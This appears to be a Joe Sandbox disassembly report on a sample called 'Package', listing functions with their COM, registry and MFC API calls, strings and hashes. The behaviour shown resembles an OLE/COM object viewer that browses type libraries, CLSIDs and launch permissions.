#800.MFC42U(00000000,?,?,?,?,?,?), ref: 0020DA01
#1197.MFC42U(?,00000000,00000000,00000000,?,?,?,?,?,?), ref: 0020DA0B
#800.MFC42U(?,00000000,00000000,00000000,?,?,?,?,?,?), ref: 0020DA13

Strings

<No system message defined> %s, xrefs: 0020D9CF
%s %s, xrefs: 0020D966

Memory Dump Source

Source File: 00000003.00000002.1978849931.00000000001F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 001F0000, based on PE: true

Associated: 00000003.00000002.1978829044.00000000001F0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1978888808.0000000000213000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1978915763.0000000000214000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1f0000_Package.jbxd

Similarity

API ID: #800$#1197#2810#540#858#922$FormatFreeH_prolog3LocalMessagewsprintf
String ID: %s %s$<No system message defined> %s
API String ID: 3659733580-1395831093
Opcode ID: fd4b745bbcd60e92675cbf3a5a63eed5747ce25c308639d08f0bc7b0aa1b6624
Instruction ID: 2374e0e1c65c20e51f4580d58d3b8af0ca8cba3e9ba4d742ed6bf29bfc3b215b
Opcode Fuzzy Hash: fd4b745bbcd60e92675cbf3a5a63eed5747ce25c308639d08f0bc7b0aa1b6624
Instruction Fuzzy Hash: 4C31E3B182120EAEDF01EBE0CD96DFFBB7CAF24344F104415B901761D3DA705A68DA61

Function 002073B0 Relevance: 30.0, APIs: 13, Strings: 4, Instructions: 216registryCOMMON

Download Yara Rule

APIs

RegOpenKeyW.ADVAPI32(80000000,TypeLib,00000000), ref: 00207402
RegEnumKeyW.ADVAPI32(00000000,00000000,?,00000040), ref: 0020743B
RegOpenKeyW.ADVAPI32(00000000,?,?), ref: 0020745D
RegEnumKeyW.ADVAPI32(?,00000000,?,00000040), ref: 00207496
RegQueryValueW.ADVAPI32(?,?,?,00000208), ref: 002074C9
CLSIDFromString.OLE32(00000000,-00000008), ref: 00207570
wcstol.MSVCRT ref: 00207610
wcsrchr.MSVCRT ref: 0020762C
wcstol.MSVCRT ref: 00207650
wsprintfW.USER32 ref: 00207696
wsprintfW.USER32 ref: 002076B9

Part of subcall function 00207F0B: SendMessageW.USER32(?,00001132,00000000,RH ), ref: 00207F1D

RegCloseKey.ADVAPI32(?), ref: 00207743
RegCloseKey.ADVAPI32(00000000), ref: 00207754

Strings

%s <no name>, xrefs: 0020768A
%s (Ver %s), xrefs: 002076AD
TypeLib, xrefs: 002073F8
', xrefs: 002076E2

Memory Dump Source

Source File: 00000003.00000002.1978849931.00000000001F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 001F0000, based on PE: true

Associated: 00000003.00000002.1978829044.00000000001F0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1978888808.0000000000213000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1978915763.0000000000214000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1f0000_Package.jbxd

Similarity

API ID: CloseEnumOpenwcstolwsprintf$FromMessageQuerySendStringValuewcsrchr
String ID: %s (Ver %s)$%s <no name>$'$TypeLib
API String ID: 3817488620-1332438793
Opcode ID: 6306dc6673cd96f2d31e4c09537bfbe3ebb034649ddc840833c07e1fbcdd2892
Instruction ID: 02ce8e668099b555b418199171019694dec45d9687f9dff56cb2789e2b0c3b1e
Opcode Fuzzy Hash: 6306dc6673cd96f2d31e4c09537bfbe3ebb034649ddc840833c07e1fbcdd2892
Instruction Fuzzy Hash: 17A1E371D182289FDB61DF24DC49BE9B7B8EB18305F0040EAE50DA6291DB78BE94DF41

Function 0020D0B6 Relevance: 29.9, APIs: 11, Strings: 6, Instructions: 175registrystringCOMMON

Download Yara Rule

APIs

StringFromGUID2.OLE32(?,?,00000028,?,?,?,?,?,?,?), ref: 0020D152
lstrcpyW.KERNEL32(?,?,?,?,?,?,?,?,?), ref: 0020D163
wsprintfW.USER32 ref: 0020D179
RegOpenKeyW.ADVAPI32(80000000,CLSID,?), ref: 0020D1AA
wsprintfW.USER32 ref: 0020D1CD

Part of subcall function 0020D6F5: RegOpenKeyExW.KERNELBASE(?,?,00000000,00020019,?,?,?,?,0020D6E4,80000000,?,?,?,?,?), ref: 0020D70D
Part of subcall function 0020D6F5: RegQueryValueExW.ADVAPI32(?,?,00000000,?,80000000,0020D6E4,?,?,?,0020D6E4,80000000,?,?,?,?,?), ref: 0020D72C
Part of subcall function 0020D6F5: RegCloseKey.ADVAPI32(?,?,?,?,0020D6E4,80000000,?,?,?,?,?,?,?,?), ref: 0020D738

_wcsicmp.MSVCRT ref: 0020D20E
wsprintfW.USER32 ref: 0020D22D

Part of subcall function 0020D81B: lstrlenW.KERNEL32(0020D19D,?,80000000,00000000), ref: 0020D846

RegEnumKeyW.ADVAPI32(?,00000000,?,000000FF), ref: 0020D25C
RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0020D270
wsprintfW.USER32 ref: 0020D286
lstrcpyW.KERNEL32(00000000,?), ref: 0020D2C0

Strings

AppID\%s, xrefs: 0020D280
LocalServer32, xrefs: 0020D11C
CLSID\%s\LocalServer32, xrefs: 0020D1C7
AppID, xrefs: 0020D18B, 0020D23A
CLSID, xrefs: 0020D1A4
CLSID\%s, xrefs: 0020D173, 0020D227

Memory Dump Source

Source File: 00000003.00000002.1978849931.00000000001F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 001F0000, based on PE: true

Associated: 00000003.00000002.1978829044.00000000001F0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1978888808.0000000000213000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1978915763.0000000000214000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1f0000_Package.jbxd

Similarity

API ID: wsprintf$CloseOpenlstrcpy$EnumFromQueryStringValue_wcsicmplstrlen
String ID: AppID$AppID\%s$CLSID$CLSID\%s$CLSID\%s\LocalServer32$LocalServer32
API String ID: 566217164-1287389397
Opcode ID: ab0fe5cf416b7e6a48d8d8f5fb3f2e9e39a13351f471fe93a691c3f37fbbe95b
Instruction ID: e5ff3f6455cdb9185c4eaeab6c388f8dafcd3c5ee3db5028560039178ea5487c
Opcode Fuzzy Hash: ab0fe5cf416b7e6a48d8d8f5fb3f2e9e39a13351f471fe93a691c3f37fbbe95b
Instruction Fuzzy Hash: B8511F7290021DAEDF20EB94DD49EEB77BDEF45300F4040A5BA49E6041DFB09B598F91

Function 001FF346 Relevance: 29.8, APIs: 15, Strings: 2, Instructions: 72COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 001FF34D
#324.MFC42U(0000008B,00000000,00000008,001FD701,0000007A,00000008,001FD2DA,00000004), ref: 001FF35E
#567.MFC42U(0000008B,00000000,00000008,001FD701,0000007A,00000008,001FD2DA,00000004), ref: 001FF375
#567.MFC42U(0000008B,00000000,00000008,001FD701,0000007A,00000008,001FD2DA,00000004), ref: 001FF38F
#567.MFC42U(0000008B,00000000,00000008,001FD701,0000007A,00000008,001FD2DA,00000004), ref: 001FF3AA
#567.MFC42U(0000008B,00000000,00000008,001FD701,0000007A,00000008,001FD2DA,00000004), ref: 001FF3C0
#567.MFC42U(0000008B,00000000,00000008,001FD701,0000007A,00000008,001FD2DA,00000004), ref: 001FF3DA
#540.MFC42U(0000008B,00000000,00000008,001FD701,0000007A,00000008,001FD2DA,00000004), ref: 001FF3EF
#540.MFC42U(0000008B,00000000,00000008,001FD701,0000007A,00000008,001FD2DA,00000004), ref: 001FF400
#540.MFC42U(0000008B,00000000,00000008,001FD701,0000007A,00000008,001FD2DA,00000004), ref: 001FF40F
#540.MFC42U(0000008B,00000000,00000008,001FD701,0000007A,00000008,001FD2DA,00000004), ref: 001FF420
#861.MFC42U(001F21A0,0000008B,00000000,00000008,001FD701,0000007A,00000008,001FD2DA,00000004), ref: 001FF436
#861.MFC42U(001F21A0,001F21A0,0000008B,00000000,00000008,001FD701,0000007A,00000008,001FD2DA,00000004), ref: 001FF442
#861.MFC42U(001F21A0,001F21A0,001F21A0,0000008B,00000000,00000008,001FD701,0000007A,00000008,001FD2DA,00000004), ref: 001FF453
#861.MFC42U(001F21A0,001F21A0,001F21A0,001F21A0,0000008B,00000000,00000008,001FD701,0000007A,00000008,001FD2DA,00000004), ref: 001FF45F

Strings

, xrefs: 001FF3DF
P , xrefs: 001FF394

Memory Dump Source

Source File: 00000003.00000002.1978849931.00000000001F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 001F0000, based on PE: true

Associated: 00000003.00000002.1978829044.00000000001F0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1978888808.0000000000213000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1978915763.0000000000214000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1f0000_Package.jbxd

Similarity

API ID: #567$#540#861$#324H_prolog3
String ID: $P
API String ID: 1167559088-2958298612
Opcode ID: 0fb7b981b3b31c12909bb05e0ee8668985046aa1aa82f9139ac1fbe9ee3f6bc0
Instruction ID: 05d75c9ed298d55aec88754bcc47ba0fdbc545acb9b8a40b9e4dac96f99682a6
Opcode Fuzzy Hash: 0fb7b981b3b31c12909bb05e0ee8668985046aa1aa82f9139ac1fbe9ee3f6bc0
Instruction Fuzzy Hash: 32316D70A11346DBDB19EB64CA023ECFAA06F54300F51448CE645272C3DBB42B55CF91

Function 00205270 Relevance: 28.2, APIs: 15, Strings: 1, Instructions: 231COMMON

Download Yara Rule

APIs

#4078.MFC42U(001F4A54), ref: 0020529C

Strings

", xrefs: 002054FF

Memory Dump Source

Source File: 00000003.00000002.1978849931.00000000001F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 001F0000, based on PE: true

Associated: 00000003.00000002.1978829044.00000000001F0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1978888808.0000000000213000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1978915763.0000000000214000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1f0000_Package.jbxd

Similarity

API ID: #4078
String ID: "
API String ID: 2741252101-123907689
Opcode ID: aae845bbf202abfa04543f8d411ae8fb7087464fc0409a079cc6a9ace7309559
Instruction ID: d57c2b1540c7e6e2f5d532b5fb544e5625dc70d96ddda5898f75085fba38fd8e
Opcode Fuzzy Hash: aae845bbf202abfa04543f8d411ae8fb7087464fc0409a079cc6a9ace7309559
Instruction Fuzzy Hash: 12A10934D20719DFDB14DFA4E849BEEBBB2EF58301F108065E406A62E2DBB45A90DF11

Function 001FB734 Relevance: 28.1, APIs: 14, Strings: 2, Instructions: 146comCOMMON

Download Yara Rule

APIs

__EH_prolog3_GS.LIBCMT ref: 001FB73B
#538.MFC42U(?), ref: 001FB775

Part of subcall function 00204899: #1662.MFC42U ref: 002048D9
Part of subcall function 00204899: #540.MFC42U ref: 002048F3
Part of subcall function 00204899: lstrcpyW.KERNEL32(?,00000000), ref: 00204912
Part of subcall function 00204899: CreateBindCtx.OLE32(00000000,?), ref: 00204936
Part of subcall function 00204899: MkParseDisplayName.OLE32(?,00000000,00000000,00000000), ref: 00204971
Part of subcall function 00204899: #2644.MFC42U ref: 002049D1
Part of subcall function 00204899: #2810.MFC42U(?,MkParseDisplayName(... "%s" ...) failed.,?), ref: 002049E9
Part of subcall function 00204899: #800.MFC42U(?,00000000), ref: 00204A19

#800.MFC42U(?,?,?), ref: 001FB799
#538.MFC42U(?,?,?,?), ref: 001FB7A9
#800.MFC42U(?,?,?), ref: 001FB7D1
CLSIDFromProgID.OLE32(?,?,?,?,?), ref: 001FB7F1
CoCreateInstance.OLE32(?,00000000,?), ref: 001FB824
#538.MFC42U(?), ref: 001FB836
#540.MFC42U ref: 001FB84A
#2810.MFC42U(?,CoCreateInstance failed using the CLSID for '%s',?), ref: 001FB862

Part of subcall function 0020D91D: __EH_prolog3.LIBCMT ref: 0020D924
Part of subcall function 0020D91D: FormatMessageW.KERNEL32(00001100,00000000,?,00000409,?,00000000,00000000,00000010,0020B9B7,?,00000000,00000000,00000000), ref: 0020D942
Part of subcall function 0020D91D: #540.MFC42U ref: 0020D94F
Part of subcall function 0020D91D: #2810.MFC42U(?,%s %s,?,00000000,?), ref: 0020D96C
Part of subcall function 0020D91D: #922.MFC42U(?,?,?,?,?,?,?), ref: 0020D97F
Part of subcall function 0020D91D: #858.MFC42U(00000000,?,?,?,?,?,?,?), ref: 0020D98C
Part of subcall function 0020D91D: #800.MFC42U(00000000,?,?,?,?,?,?,?), ref: 0020D997
Part of subcall function 0020D91D: LocalFree.KERNEL32(?,00000000,?,?,?,?,?,?,?), ref: 0020D99F
Part of subcall function 0020D91D: #1197.MFC42U(?,00000000,00000000,?,?,?,?), ref: 0020D9AA
Part of subcall function 0020D91D: #800.MFC42U(?,00000000,00000000,00000000,?,?,?,?,?,?), ref: 0020DA13

#800.MFC42U(?,8007000E), ref: 001FB8F8

Strings

CoCreateInstance failed using the CLSID for '%s', xrefs: 001FB85C
The command line (%s) does not contain a valid persistent OLE object, ProgID, or Type Library file., xrefs: 001FB8DD

Memory Dump Source

Source File: 00000003.00000002.1978849931.00000000001F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 001F0000, based on PE: true

Associated: 00000003.00000002.1978829044.00000000001F0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1978888808.0000000000213000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1978915763.0000000000214000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1f0000_Package.jbxd

Similarity

API ID: #800$#2810#538#540$Create$#1197#1662#2644#858#922BindDisplayFormatFreeFromH_prolog3H_prolog3_InstanceLocalMessageNameParseProglstrcpy
String ID: CoCreateInstance failed using the CLSID for '%s'$The command line (%s) does not contain a valid persistent OLE object, ProgID, or Type Library file.
API String ID: 2990471804-1967779486
Opcode ID: b0a64914037aab96e75aa107929af3f722b8c3bd706fc3c5d69b3cae608fb3c8
Instruction ID: 2f98affa3a8f115742091dcbfbbd798ef88aa107e438989d655068a146472f20
Opcode Fuzzy Hash: b0a64914037aab96e75aa107929af3f722b8c3bd706fc3c5d69b3cae608fb3c8
Instruction Fuzzy Hash: 56514B7191121CDBCB00EFA0D995EEDBBB9AF58350F154199EA11B7292DB30AE05CF60

Function 00202570 Relevance: 28.1, APIs: 13, Strings: 3, Instructions: 128COMMON

Download Yara Rule

APIs

#355.MFC42U(00000001,*.*,00000000,00001804,AllFiles(*.*)|*.*|,?,85C979FC), ref: 002025C2
#2507.MFC42U(00000001,*.*,00000000,00001804,AllFiles(*.*)|*.*|,?,85C979FC), ref: 002025D1
#800.MFC42U(00000001,*.*,00000000,00001804,AllFiles(*.*)|*.*|,?,85C979FC), ref: 002025E5
#3494.MFC42U(?,00000001,*.*,00000000,00001804,AllFiles(*.*)|*.*|,?,85C979FC), ref: 0020260E
#800.MFC42U(?,00000000,?,00000001,*.*,00000000,00001804,AllFiles(*.*)|*.*|,?,85C979FC), ref: 00202679
#3494.MFC42U(?,?,00000000,?,00000001,*.*,00000000,00001804,AllFiles(*.*)|*.*|,?,85C979FC), ref: 00202696
#800.MFC42U(00000000,?,?,?,00000000,?,00000001,*.*,00000000,00001804,AllFiles(*.*)|*.*|,?,85C979FC), ref: 002026D2
#800.MFC42U(?,00000000,AllFiles(*.*)|*.*|,?,85C979FC), ref: 00202796

Strings

IMoniker::BindToObject failed on the file moniker created from ( "%s" )., xrefs: 00202748
*.*, xrefs: 002025B5
AllFiles(*.*)|*.*|, xrefs: 002025A9

Memory Dump Source

Source File: 00000003.00000002.1978849931.00000000001F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 001F0000, based on PE: true

Associated: 00000003.00000002.1978829044.00000000001F0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1978888808.0000000000213000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1978915763.0000000000214000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1f0000_Package.jbxd

Similarity

API ID: #800$#3494$#2507#355
String ID: *.*$AllFiles(*.*)|*.*|$IMoniker::BindToObject failed on the file moniker created from ( "%s" ).
API String ID: 539546934-1039925223
Opcode ID: d3275a50ba507e041979b6e8268abd6ce52260a6941aeeef1d891395c83fdb1d
Instruction ID: a12cb15f8b5c82f93ab8eb36946ff7403f8491866101936f56403f35223c3d85
Opcode Fuzzy Hash: d3275a50ba507e041979b6e8268abd6ce52260a6941aeeef1d891395c83fdb1d
Instruction Fuzzy Hash: BA510870824768DFCB26DB64CC85BECB7B8BB14701F1481E9A019A72A2DB715F98CF11

Function 00201100 Relevance: 28.1, APIs: 15, Strings: 1, Instructions: 112fileCOMMON

Download Yara Rule

APIs

__EH_prolog3_GS.LIBCMT ref: 0020110A
SetActiveWindow.USER32(?,00000228), ref: 0020111B
#2859.MFC42U(00000000), ref: 00201122
DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 0020112E
DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 00201152
#1165.MFC42U ref: 00201158
#538.MFC42U(?), ref: 00201187

Part of subcall function 00204899: #1662.MFC42U ref: 002048D9
Part of subcall function 00204899: #540.MFC42U ref: 002048F3
Part of subcall function 00204899: lstrcpyW.KERNEL32(?,00000000), ref: 00204912
Part of subcall function 00204899: CreateBindCtx.OLE32(00000000,?), ref: 00204936
Part of subcall function 00204899: MkParseDisplayName.OLE32(?,00000000,00000000,00000000), ref: 00204971
Part of subcall function 00204899: #2644.MFC42U ref: 002049D1
Part of subcall function 00204899: #2810.MFC42U(?,MkParseDisplayName(... "%s" ...) failed.,?), ref: 002049E9
Part of subcall function 00204899: #800.MFC42U(?,00000000), ref: 00204A19

#800.MFC42U(?,00000000,?), ref: 002011B5
#538.MFC42U(?,?,00000000,?), ref: 002011CB

Part of subcall function 002042EB: #1662.MFC42U(85C979FC), ref: 00204326

#800.MFC42U(00000000,?,?,?,00000000,?), ref: 002011F9
LoadTypeLib.OLEAUT32(?,00000000), ref: 0020121B
#540.MFC42U ref: 00201258
#2810.MFC42U(?,The file droped (%s) is not a valid persistent OLE object or Type Library file.,?), ref: 00201277

Part of subcall function 0020D91D: __EH_prolog3.LIBCMT ref: 0020D924
Part of subcall function 0020D91D: FormatMessageW.KERNEL32(00001100,00000000,?,00000409,?,00000000,00000000,00000010,0020B9B7,?,00000000,00000000,00000000), ref: 0020D942
Part of subcall function 0020D91D: #540.MFC42U ref: 0020D94F
Part of subcall function 0020D91D: #2810.MFC42U(?,%s %s,?,00000000,?), ref: 0020D96C
Part of subcall function 0020D91D: #922.MFC42U(?,?,?,?,?,?,?), ref: 0020D97F
Part of subcall function 0020D91D: #858.MFC42U(00000000,?,?,?,?,?,?,?), ref: 0020D98C
Part of subcall function 0020D91D: #800.MFC42U(00000000,?,?,?,?,?,?,?), ref: 0020D997
Part of subcall function 0020D91D: LocalFree.KERNEL32(?,00000000,?,?,?,?,?,?,?), ref: 0020D99F
Part of subcall function 0020D91D: #1197.MFC42U(?,00000000,00000000,?,?,?,?), ref: 0020D9AA
Part of subcall function 0020D91D: #800.MFC42U(?,00000000,00000000,00000000,?,?,?,?,?,?), ref: 0020DA13

#800.MFC42U(?,00000000), ref: 00201296
DragFinish.SHELL32(?), ref: 002012AF

Strings

The file droped (%s) is not a valid persistent OLE object or Type Library file., xrefs: 00201271

Memory Dump Source

Source File: 00000003.00000002.1978849931.00000000001F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 001F0000, based on PE: true

Associated: 00000003.00000002.1978829044.00000000001F0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1978888808.0000000000213000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1978915763.0000000000214000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1f0000_Package.jbxd

Similarity

API ID: #800$#2810#540Drag$#1662#538FileQuery$#1165#1197#2644#2859#858#922ActiveBindCreateDisplayFinishFormatFreeH_prolog3H_prolog3_LoadLocalMessageNameParseTypeWindowlstrcpy
String ID: The file droped (%s) is not a valid persistent OLE object or Type Library file.
API String ID: 1998644663-3375467908
Opcode ID: d3fd002afb8e78a84ecfaf92e61b9b4ae211f2a5ecf1a95adf6b64cfb1772c99
Instruction ID: c9a1c5981d27359ff380dd3963ff1c91de2f14a863d89846f26a36ce3d8aa629
Opcode Fuzzy Hash: d3fd002afb8e78a84ecfaf92e61b9b4ae211f2a5ecf1a95adf6b64cfb1772c99
Instruction Fuzzy Hash: D2413C7591122DABCB10EBA0DC89BDDB778AF18320F1142D5E909A71D2DB30AF95CF90

Function 00200F10 Relevance: 28.1, APIs: 13, Strings: 3, Instructions: 81COMMON

Download Yara Rule

APIs

__EH_prolog3_GS.LIBCMT ref: 00200F1A
#355.MFC42U(00000001,*.tlb,00000000,00001804,TypeLib Files (*.tlb;*.olb;*.dll;*.ocx;*.exe)|*.tlb;*.olb;*.dll;*.ocx;*.exe|AllFiles(*.*)|*.*|,?,00000354), ref: 00200F3C
#2507.MFC42U(00000001,*.tlb,00000000,00001804,TypeLib Files (*.tlb;*.olb;*.dll;*.ocx;*.exe)|*.tlb;*.olb;*.dll;*.ocx;*.exe|AllFiles(*.*)|*.*|,?,00000354), ref: 00200F4A
#3494.MFC42U(?,00000001,*.tlb,00000000,00001804,TypeLib Files (*.tlb;*.olb;*.dll;*.ocx;*.exe)|*.tlb;*.olb;*.dll;*.ocx;*.exe|AllFiles(*.*)|*.*|,?,00000354), ref: 00200F6B
LoadTypeLib.OLEAUT32(?,?), ref: 00200F89
#540.MFC42U(?,00000001,*.tlb,00000000,00001804,TypeLib Files (*.tlb;*.olb;*.dll;*.ocx;*.exe)|*.tlb;*.olb;*.dll;*.ocx;*.exe|AllFiles(*.*)|*.*|,?,00000354), ref: 00200FA2
#3494.MFC42U(?,?,00000001,*.tlb,00000000,00001804,TypeLib Files (*.tlb;*.olb;*.dll;*.ocx;*.exe)|*.tlb;*.olb;*.dll;*.ocx;*.exe|AllFiles(*.*)|*.*|,?,00000354), ref: 00200FB8
#2810.MFC42U(?,LoadTypeLib( %s ) failed.,00000000,?,?,00000001,*.tlb,00000000,00001804,TypeLib Files (*.tlb;*.olb;*.dll;*.ocx;*.exe)|*.tlb;*.olb;*.dll;*.ocx;*.exe|AllFiles(*.*)|*.*|,?,00000354), ref: 00200FCF
#800.MFC42U ref: 00200FE1
#800.MFC42U(?,8007000E), ref: 00200FF9
#800.MFC42U(?,00000354), ref: 00201034
#800.MFC42U(00000001,*.tlb,00000000,00001804,TypeLib Files (*.tlb;*.olb;*.dll;*.ocx;*.exe)|*.tlb;*.olb;*.dll;*.ocx;*.exe|AllFiles(*.*)|*.*|,?,00000354), ref: 0020103F
#641.MFC42U(00000001,*.tlb,00000000,00001804,TypeLib Files (*.tlb;*.olb;*.dll;*.ocx;*.exe)|*.tlb;*.olb;*.dll;*.ocx;*.exe|AllFiles(*.*)|*.*|,?,00000354), ref: 0020104A

Strings

TypeLib Files (*.tlb;*.olb;*.dll;*.ocx;*.exe)|*.tlb;*.olb;*.dll;*.ocx;*.exe|AllFiles(*.*)|*.*|, xrefs: 00200F22
*.tlb, xrefs: 00200F35
LoadTypeLib( %s ) failed., xrefs: 00200FC9

Memory Dump Source

Source File: 00000003.00000002.1978849931.00000000001F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 001F0000, based on PE: true

Associated: 00000003.00000002.1978829044.00000000001F0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1978888808.0000000000213000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1978915763.0000000000214000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1f0000_Package.jbxd

Similarity

API ID: #800$#3494$#2507#2810#355#540#641H_prolog3_LoadType
String ID: *.tlb$LoadTypeLib( %s ) failed.$TypeLib Files (*.tlb;*.olb;*.dll;*.ocx;*.exe)|*.tlb;*.olb;*.dll;*.ocx;*.exe|AllFiles(*.*)|*.*|
API String ID: 2313197997-4003309560
Opcode ID: 626b2207e55db633905a40a04cd44aa615ee3cc2b681d8f8d9aa4e793b082aa1
Instruction ID: 1752cc1fbb3cec1b081112953bf89e35ada7ad818a7a0daa92aca09035ff48f0
Opcode Fuzzy Hash: 626b2207e55db633905a40a04cd44aa615ee3cc2b681d8f8d9aa4e793b082aa1
Instruction Fuzzy Hash: 323169319207A89BCB26EB90CC85AEDB778AF24705F0840D9B509671E3DB711FA8CF51

Function 00200810 Relevance: 28.1, APIs: 13, Strings: 3, Instructions: 77windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00200826
#4219.MFC42U(Selecting default permissions will delete any changes you have ever made to the launch permission list of this application. Are yo,Launch Permissions,00000004), ref: 0020083E
LoadCursorW.USER32(00000000,00007F02), ref: 00200853
SetCursor.USER32(00000000), ref: 0020085A
SendMessageW.USER32(?,00001009,00000000,00000000), ref: 0020088A
#2634.MFC42U(00000000), ref: 00200897
#2634.MFC42U(00000000,00000000), ref: 002008A3
LoadCursorW.USER32(00000000,00007F00), ref: 002008AE
SetCursor.USER32(00000000), ref: 002008B5
#4118.MFC42U ref: 002008C3
SendMessageW.USER32(?,000000F1,00000001,00000000), ref: 002008DB
#5977.MFC42U ref: 002008E4
SendMessageW.USER32(?,000000F1,00000000,00000000), ref: 002008F2

Strings

Launch Permissions, xrefs: 00200832
Selecting default permissions will delete any changes you have ever made to the launch permission list of this application. Are yo, xrefs: 00200837
LaunchPermission, xrefs: 00200860

Memory Dump Source

Source File: 00000003.00000002.1978849931.00000000001F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 001F0000, based on PE: true

Associated: 00000003.00000002.1978829044.00000000001F0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1978888808.0000000000213000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1978915763.0000000000214000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1f0000_Package.jbxd

Similarity

API ID: CursorMessageSend$#2634Load$#4118#4219#5977
String ID: Launch Permissions$LaunchPermission$Selecting default permissions will delete any changes you have ever made to the launch permission list of this application. Are yo
API String ID: 791338786-3477396783
Opcode ID: 072b1079ff37e847e16e6942f3b326d5566f2870192c7d763349035400f49f06
Instruction ID: 94ce631a4523aff92c527ae8051d36d28460456a2c2cc3a4f631d35b010b9ac9
Opcode Fuzzy Hash: 072b1079ff37e847e16e6942f3b326d5566f2870192c7d763349035400f49f06
Instruction Fuzzy Hash: 25216F31251310ABEB216F61DC8EFE77A29EF42751F018430FA1E9D0D7CFA04852CAA0

Function 001FD2E0 Relevance: 27.2, APIs: 18, Instructions: 221windowCOMMON

Download Yara Rule

APIs

#5031.MFC42U(?,?,?), ref: 001FD301
#6193.MFC42U(00000000,00000004,?,?,?,00000014,?), ref: 001FD34C
GetWindowRect.USER32(00000000,?), ref: 001FD320

Part of subcall function 001FC8A6: ScreenToClient.USER32(?,?), ref: 001FC8B7
Part of subcall function 001FC8A6: ScreenToClient.USER32(?,?), ref: 001FC8C4
Part of subcall function 001FC8A6: #3133.MFC42U(?,?,?,001FC46E,?), ref: 001FC8CC

GetWindowRect.USER32(00000000,?), ref: 001FD36B
SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 001FD38B
#6193.MFC42U(00000000,00000005,00000019,?,?,00000000), ref: 001FD3BC
GetWindowRect.USER32(00000000,?), ref: 001FD3E6
SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 001FD406
#6193.MFC42U(00000000,00000005,00000019,?,?,00000000), ref: 001FD430
GetWindowRect.USER32(00000000,?), ref: 001FD44F
SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 001FD46F
#6193.MFC42U(00000000,00000005,00000019,?,?,00000000), ref: 001FD499
GetWindowRect.USER32(00000000,?), ref: 001FD4B8
SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 001FD4D8
#6193.MFC42U(00000000,00000005,00000019,?,?,00000000), ref: 001FD502
GetWindowRect.USER32(00000000,?), ref: 001FD521
SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 001FD541
#6193.MFC42U(00000000,00000005,00000019,?,?,00000000), ref: 001FD568

Memory Dump Source

Source File: 00000003.00000002.1978849931.00000000001F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 001F0000, based on PE: true

Associated: 00000003.00000002.1978829044.00000000001F0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1978888808.0000000000213000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1978915763.0000000000214000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1f0000_Package.jbxd

Similarity

API ID: #6193RectWindow$MessageSend$ClientScreen$#3133#5031
String ID:
API String ID: 4086507556-0
